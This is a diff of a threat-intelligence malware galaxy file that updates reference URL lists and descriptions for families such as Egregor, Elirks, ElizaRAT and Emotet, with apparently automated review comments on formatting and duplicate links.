"https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html", + "https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/", + "https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor", + "https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", + "https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/", + "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf", + "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox", + 
"https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", + "https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/", + "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", + "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/", + "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/", + "https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/", + "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", + "https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/", + "https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf", + "https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia", + "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", + "https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/", + "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", + "https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html", + "https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html", + "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", + "https://securityintelligence.com/posts/egregor-ransomware-negotiations-uncovered/", + 
"https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/EGREGOR%20REPORT%20WEB%20FINAL.pdf", + "https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/", + "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/", + "https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/", + "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", + "https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html", "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html", "https://twitter.com/redcanary/status/1334224861628039169", - "https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/", - "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/", - "https://securityintelligence.com/posts/egregor-ransomware-negotiations-uncovered/", - "https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/", - "https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html", - "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/EGREGOR%20REPORT%20WEB%20FINAL.pdf", - 
"https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf", - "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/", - "https://www.bleepingcomputer.com/news/security/retail-giant-cencosud-hit-by-egregor-ransomware-attack-stores-impacted/", - "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware", - "https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf", - "https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.group-ib.com/blog/egregor", - "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf", - "https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/", "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", - "https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor", - "https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/", - "https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + 
"https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/", + "https://securelist.com/targeted-ransomware-encrypting-data/99255/", + "https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf", "https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/", - "https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia", - "https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/", - "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/", - "https://securelist.com/targeted-ransomware-encrypting-data/99255/" + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf" ], "synonyms": [], "type": [] @@ -23064,8 +24155,8 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish", "https://www.us-cert.gov/ncas/analysis-reports/AR19-129A", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", - "https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf" ], "synonyms": [], "type": [] 
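Review bot: The new Egregor description ends with a trailing space after `folders.”`, which will show up verbatim in any UI rendering the galaxy; trim it to end at `\u201d`. The new `refs` list also pairs live URLs with their Wayback captures (`https://cisoclub.ru/doc/...` and `https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/...`) and cites CERTFR-2021-CTI-009 as both the `/cti/` page and the `/uploads/...pdf`; if both forms are to be kept that is defensible for link-rot reasons, but it should be a deliberate policy of the import rather than an accident of merging two lists. The ElectricFish hunk sharing this line is a reorder only.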
@@ -23087,11 +24178,12 @@ "value": "ElectricPowder" }, { - "description": "", + "description": "Elirks is a basic backdoor Trojan, first discovered in 2010, that is primarily used to steal information from compromised systems. Mostly attacks using Elirks occurring in East Asia. One of the unique features of the malware is that it retrieves its C2 address by accessing a pre-determined microblog service or SNS. Attackers create accounts on those services and post encoded IP addresses or the domain names of real C2 servers in advance of distributing the backdoor. Multiple Elirks variants using Japanese blog services for the last couple of years.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks", - "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" + "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/", + "https://unit42.paloaltonetworks.com/unit42-tracking-elirks-variants-in-japan-similarities-to-previous-attacks/" ], "synonyms": [], "type": [] 
@@ -23104,16 +24196,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elise", - "https://documents.trendmicro.com/assets/threat-reports/rpt-1h-2014-targeted-attack-trends-in-asia-pacific.pdf", - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", "https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", + "https://www.secureworks.com/research/threat-profiles/bronze-elgin", + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries", "https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf", + "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", + "https://documents.trendmicro.com/assets/threat-reports/rpt-1h-2014-targeted-attack-trends-in-asia-pacific.pdf", + "https://www.joesecurity.org/blog/8409877569366580427", "https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf", "https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/", - "https://www.secureworks.com/research/threat-profiles/bronze-elgin", - "https://www.fireeye.com/blog/threat-research/2020/04/code-grafting-to-unpack-malware-in-emulation.html", - "https://securelist.com/blog/research/70726/the-spring-dragon-apt/", - "https://www.joesecurity.org/blog/8409877569366580427" + "https://www.fireeye.com/blog/threat-research/2020/04/code-grafting-to-unpack-malware-in-emulation.html" ], "synonyms": [ "EVILNEST" 
@@ -23123,6 +24215,19 @@ "uuid": "3477a25d-e04b-475e-8330-39f66c10cc01", "value": "Elise" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.eliza_rat", + "https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c13fc723-0fd8-4e27-b1d7-a71976ad0268", + "value": "ElizaRAT" + }, { "description": "This dropper masquerades itself as Adobe software, titled as Adobe.msi. It is used to executes the python written Backdoor used by this threat actor.", "meta": { @@ -23141,11 +24246,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer", - "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", - "https://www.symantec.com/security-center/writeup/2015-122210-5724-99", "https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/", + "https://attack.mitre.org/software/S0064", "https://attack.mitre.org/groups/G0023", - "https://attack.mitre.org/software/S0064" + "https://www.symantec.com/security-center/writeup/2015-122210-5724-99", + "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html" ], "synonyms": [ "Elmost" 
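Review bot: The new ElizaRAT cluster is added with `"description": ""`, while the same commit is populating previously empty descriptions for other families (Egregor, Elirks), so analysts will see a blank entry for this one. A one-sentence summary drawn from the cited Zscaler write-up (whose URL already frames it as part of APT36's arsenal) would make the entry useful on its own; an empty string also defeats tooling that treats a missing description as "needs enrichment". The uuid and the empty `synonyms`/`type` arrays follow the file's existing conventions; the Elmer hunk on this line is a reorder only.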
@@ -23160,12 +24265,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emdivi", - "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html", + "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", "https://securelist.com/new-activity-of-the-blue-termite-apt/71876/", "http://blog.trendmicro.com/trendlabs-security-intelligence/attackers-target-organizations-in-japan-transform-local-sites-into-cc-servers-for-emdivi-backdoor/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", - "https://www.macnica.net/file/security_report_20160613.pdf", - "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/" + "https://www.virusbulletin.com/virusbulletin/2020/05/vb2019-paper-apt-cases-exploiting-vulnerabilities-regionspecific-software/", + "http://blog.jpcert.or.jp/2015/11/decrypting-strings-in-emdivi.html", + "https://www.macnica.net/file/security_report_20160613.pdf" ], "synonyms": [], "type": [] 
@@ -23191,316 +24296,319 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet", - "https://blogs.vmware.com/security/2022/05/emotet-config-redux.html", - "https://www.anomali.com/blog/mummy-spiders-emotet-malware-is-back-after-a-year-hiatus-wizard-spiders-trickbot-observed-in-its-return", - "https://www.youtube.com/watch?v=q8of74upT_g", - "https://www.vmware.com/content/dam/learn/en/amer/fy23/pdf/1669005_Emotet_Exposed_A_Look_Inside_the_Cybercriminal_Supply_Chain.pdf", - "https://blog.malwarebytes.com/botnets/2019/09/emotet-is-back-botnet-springs-back-to-life-with-new-spam-campaign/", - "https://www.esentire.com/security-advisories/emotet-activity-identified", - "https://www.bka.de/DE/Presse/Listenseite_Pressemitteilungen/2021/Presse2021/210127_pmEmotet.html", - "https://www.spamhaus.org/news/article/783/emotet-adds-a-further-layer-of-camouflage", - "https://unit42.paloaltonetworks.com/c2-traffic/", - "https://blogs.vmware.com/security/2022/08/how-to-replicate-emotet-lateral-movement.html", - "https://www.trendmicro.com/en_us/research/22/e/bruised-but-not-broken--the-resurgence-of-the-emotet-botnet-malw.html", - "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2020-ALE-019/", - "https://www.deepinstinct.com/2020/08/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before/", - "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", - "https://www.us-cert.gov/ncas/alerts/TA18-201A", - "https://exchange.xforce.ibmcloud.com/collection/18f373debc38779065a26f1958dc260b", - "https://medium.com/brim-securitys-knowledge-funnel/hunting-emotet-with-brim-and-zeek-1000c2f5c1ff", - "https://github.com/d00rt/emotet_research", - "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html", - "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment", - 
"https://www.bleepingcomputer.com/news/security/emotet-botnet-switches-to-64-bit-modules-increases-activity/", - "https://unit42.paloaltonetworks.com/emotet-command-and-control/", - "https://thedfirreport.com/2022/09/12/dead-or-alive-an-emotet-story/", - "https://blogs.cisco.com/security/emotet-is-back", - "https://blog.threatlab.info/malware-analysis-emotet-infection/", - "https://www.netskope.com/blog/you-can-run-but-you-cant-hide-advanced-emotet-updates", - "https://unit42.paloaltonetworks.com/attack-chain-overview-emotet-in-december-2020-and-january-2021/", - "https://www.picussecurity.com/blog/emotet-technical-analysis-part-1-reveal-the-evil-code", - "https://www.bleepingcomputer.com/news/security/emotet-trickbot-malware-duo-is-back-infecting-windows-machines/", - "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", - "https://www.welivesecurity.com/2022/06/16/how-emotet-is-changing-tactics-microsoft-tightening-office-macro-security/", - "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks", - "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx", - "https://marcoramilli.com/2019/10/14/is-emotet-gang-targeting-companies-with-external-soc/", - "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf", - "https://www.cert.govt.nz/it-specialists/advisories/emotet-malware-being-spread-via-email/", - "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", - "https://blog.talosintelligence.com/2020/11/emotet-2020.html", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-003.pdf", - "https://pl-v.github.io/plv/posts/Emotet-unpacking/", - "https://intel471.com/blog/emotet-takedown-2021/", - 
"https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", - "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-two-596128", - "https://blog.talosintelligence.com/2020/02/coronavirus-themed-malware.html", - "https://www.binarydefense.com/emotet-evolves-with-new-wi-fi-spreader/", - "https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf", - "https://www.spamhaus.com/custom-content/uploads/2021/04/Botnet-update-Q1-2021.pdf", - "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", - "https://www.netskope.com/blog/emotet-still-abusing-microsoft-office-macros", - "https://www.bitsight.com/blog/emotet-botnet-rises-again", - "https://www.inde.nz/blog/analysis-of-the-latest-wave-of-emotet-malicious-documents", - "https://www.eurojust.europa.eu/worlds-most-dangerous-malware-emotet-disrupted-through-global-action", - "https://unit42.paloaltonetworks.com/new-emotet-infection-method/", - "https://github.com/cecio/EMOTET-2020-Reversing", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", - "https://www.fortinet.com/blog/threat-research/deep-analysis-of-new-emotet-variant-part-2.html", - "https://securelist.com/the-chronicles-of-emotet/99660/", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://de.darktrace.com/blog/emotet-resurgence-cross-industry-campaign-analysis", - "https://hatching.io/blog/powershell-analysis", - "https://int0xcc.svbtle.com/dissecting-emotet-s-network-communication-protocol", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/", - "https://twitter.com/raashidbhatt/status/1237853549200936960", - "https://unit42.paloaltonetworks.com/emotet-thread-hijacking/", - 
"https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/", - "https://unit42.paloaltonetworks.com/domain-parking/", - "https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams", - "https://www.fortinet.com/blog/threat-research/ms-office-files-involved-again-in-recent-emotet-trojan-campaign-part-ii", - "https://cyber.wtf/2021/11/15/guess-whos-back/", - "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf", - "https://www.wiwo.de/my/technologie/digitale-welt/emotet-netzwerk-wie-eines-der-groessten-hacker-netzwerke-der-welt-lahmgelegt-wurde/27164048.html", - "https://www.proofpoint.com/us/blog/threat-insight/emotet-makes-timely-adoption-political-and-elections-lures", - "https://malfind.com/index.php/2018/07/23/deobfuscating-emotets-powershell-payload/", - "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-OReilly-Jarvis-End-to-end-Botnet-Monitoring.pdf", - "https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-emotets-use-of-cryptography/", - "https://blog.virustotal.com/2020/11/using-similarity-to-expand-context-and.html", - "https://blog.malwarebytes.com/threat-analysis/2021/01/cleaning-up-after-emotet-the-law-enforcement-file/", - "https://www.hornetsecurity.com/en/security-information/emotet-is-back/", - "https://blogs.vmware.com/security/2022/05/emotet-moves-to-64-bit-and-updates-its-loader.html", - "https://threatpost.com/emotet-spreading-malicious-excel-files/178444/", - "https://www.deepinstinct.com/blog/the-re-emergence-of-emotet", - "https://persianov.net/emotet-malware-analysis-part-2", - "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", - "https://www.youtube.com/watch?v=5_-oR_135ss", - "https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion", - 
"https://dissectingmalwa.re/return-of-the-mummy-welcome-back-emotet.html", - "https://blogs.jpcert.or.jp/en/2021/02/emotet-notice.html", - "https://blog.securityonion.net/2022/02/quick-malware-analysis-emotet-epoch-5.html", - "https://www.hornetsecurity.com/en/threat-research/comeback-emotet/", - "https://blog.nviso.eu/2022/03/23/hunting-emotet-campaigns-with-kusto/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://www.cronup.com/la-botnet-de-emotet-reinicia-ataques-en-chile-y-latinoamerica/", - "https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor", - "https://www.proofpoint.com/us/blog/threat-insight/q4-2020-threat-report-quarterly-analysis-cybersecurity-trends-tactics-and-themes", - "https://www.bleepingcomputer.com/news/security/emotet-malware-hits-lithuanias-national-public-health-center/", - "https://www.deepinstinct.com/blog/types-of-dropper-malware-in-microsoft-office", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", - "https://www.bleepingcomputer.com/news/security/united-nations-targeted-with-emotet-malware-phishing-attack/", - "https://www.seqrite.com/blog/the-return-of-the-emotet-as-the-world-unlocks/", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.hornetsecurity.com/en/security-informationen-en/webshells-powering-emotet/", - "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", - "https://hello.global.ntt/en-us/insights/blog/behind-the-scenes-of-the-emotet-infrastructure", - "https://www.telekom.com/en/blog/group/article/cybersecurity-dissecting-emotet-part-one-592612", - "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", - 
"https://web.archive.org/web/20211223100528/https://cloudsek.com/emotet-2-0-everything-you-need-to-know-about-the-new-variant-of-thbanking-trojan/", - "https://muha2xmad.github.io/unpacking/emotet-part-1/", - "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", - "https://www.ironnet.com/blog/detecting-a-mummyspider-campaign-and-emotet-infection", - "https://blog.talosintelligence.com/emotet-switches-to-onenote/", - "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", - "https://notes.netbytesec.com/2021/02/deobfuscating-emotet-macro-and.html", - "https://medium.com/threat-intel/emotet-dangerous-malware-keeps-on-evolving-ac84aadbb8de", - "https://www.youtube.com/watch?v=8PHCZdpNKrw", - "https://cloudblogs.microsoft.com/microsoftsecure/2017/11/06/mitigating-and-eliminating-info-stealing-qakbot-and-emotet-in-corporate-networks/?source=mmpc", - "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service", - "http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/", - "https://therecord.media/over-780000-email-accounts-compromised-by-emotet-have-been-secured/", - "https://www.netskope.com/blog/netskope-threat-coverage-the-return-of-emotet", - "https://www.gdatasoftware.com/blog/2022/01/malware-vaccines", - "https://asec.ahnlab.com/en/33600/", - "https://www.deepinstinct.com/2021/05/26/deep-dive-packing-software-cryptone/", - "https://news.sophos.com/en-us/2022/05/04/attacking-emotets-control-flow-flattening/", - "https://blog.malwarebytes.com/trojans/2020/07/long-dreaded-emotet-has-returned/", - "https://atr-blog.gigamon.com/2020/01/13/emotet-not-your-run-of-the-mill-malware/", - "https://blogs.vmware.com/networkvirtualization/2022/01/emotet-is-not-dead-yet.html/", - 
"https://r3mrum.wordpress.com/2021/01/05/manual-analysis-of-new-powersplit-maldocs-delivering-emotet/", - "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot", - "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", - "https://securelist.com/emotet-modules-and-recent-attacks/106290/", - "https://www.zscaler.com/blogs/research/emotet-back-action-after-short-break", - "https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022", - "https://speakerdeck.com/fr0gger/x-ray-of-malware-evasion-techniques-analysis-dissection-cure", - "https://twitter.com/eduardfir/status/1461856030292422659", - "https://www.infosecurity-magazine.com/blogs/a-rundown-of-the-emotet-malware/", - "https://www.zscaler.com/blogs/security-research/return-emotet-malware-analysis", - "https://blog.prevailion.com/wizard-spider-continues-to-confound-4298370f6903", - "https://cofense.com/blog/emotet-sending-malicious-emails-after-three-month-hiatus/", - "https://persianov.net/emotet-malware-analysis-part-1", - "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf", - "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html", - "https://news.sophos.com/en-us/2020/07/28/emotets-return-is-the-canary-in-the-coal-mine/?cmp=30728", - "https://blog.intel471.com/2020/04/14/understanding-the-relationship-between-emotet-ryuk-and-trickbot/", - "https://quickheal.co.in/documents/technical-paper/Whitepaper_HowToPM.pdf", - "https://www.tgsoft.it/files/report/download.asp?id=7481257469", - "https://github.com/mauronz/binja-emotet", - "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf", - "https://www.bleepingcomputer.com/news/security/microsoft-emotet-took-down-a-network-by-overheating-all-computers/", - "https://experience.mandiant.com/trending-evil-2/p/1", - 
"https://www.youtube.com/watch?v=AkZ5TYBqcU4", - "https://spamauditor.org/2020/10/the-many-faces-of-emotet/", - "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/", - "https://www.lac.co.jp/lacwatch/people/20201106_002321.html", - "https://isc.sans.edu/diary/rss/28254", - "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf", - "https://www.elastic.co/security-labs/emotet-dynamic-configuration-extraction", - "https://twitter.com/Cryptolaemus1/status/1516535343281025032", - "https://www.bleepingcomputer.com/news/security/emotet-malware-now-steals-your-email-attachments-to-attack-contacts/", - "https://www.intezer.com/mitigating-emotet-the-most-common-banking-trojan/", - "https://feodotracker.abuse.ch/?filter=version_e", - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-february-mummy-spider/", - "https://www.proofpoint.com/us/blog/threat-insight/geofenced-amazon-japan-credential-phishing-volumes-rival-emotet", - "https://twitter.com/milkr3am/status/1354459859912192002", - "https://www.cert.pl/en/news/single/analysis-of-emotet-v4/", - "https://www.secureworks.com/research/threat-profiles/gold-crestwood", - "https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/", - "https://www.cyberscoop.com/trickbot-shutdown-conti-emotet/", - "https://www.zeit.de/digital/2021-06/cybercrime-extortion-internet-spyware-ransomware-police-prosecution-hackers", - "https://hello.global.ntt/en-us/insights/blog/emotet-disruption-europol-counterattack", - "https://www.tagesschau.de/investigativ/br-recherche/emotet-schadsoftware-103.html", - "https://www.deepinstinct.com/2020/10/12/why-emotets-latest-wave-is-harder-to-catch-than-ever-before-part-2/", - 
"https://www.digitalshadows.com/blog-and-research/how-cybercriminals-are-taking-advantage-of-covid-19-scams-fraud-misinformation/", - "https://isc.sans.edu/forums/diary/Emotet%20infection%20with%20Cobalt%20Strike/28824/", - "https://paste.cryptolaemus.com", - "https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise", - "https://blog.vincss.net/2021/01/re019-from-a-to-x-analyzing-some-real-cases-which-used-recent-Emotet-samples.html", - "https://cocomelonc.github.io/tutorial/2022/04/20/malware-pers-1.html", - "https://securelist.com/analysis/publications/69560/the-banking-trojan-emotet-detailed-analysis/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/exploring-emotet-examining-emotets-activities-infrastructure/", - "https://hello.global.ntt/en-us/insights/blog/shellbot-victim-overlap-with-emotet-network-infrastructure", - "https://www.politie.nl/nieuws/2021/februari/17/politie-bestrijdt-cybercrime-via-nederlandse-infrastructuur.html", - "https://cofense.com/flash-bulletin-emotet-epoch-1-changes-c2-communication/", - "https://notes.netbytesec.com/2022/02/technical-malware-analysis-return-of.html", - "https://www.digitalshadows.com/blog-and-research/emotet-disruption/", - "https://portswigger.net/daily-swig/emotet-trojan-implicated-in-wolverine-solutions-ransomware-attack", - "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", - "https://medium.com/@Ilandu/emotet-unpacking-35bbe2980cfb", - "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", - 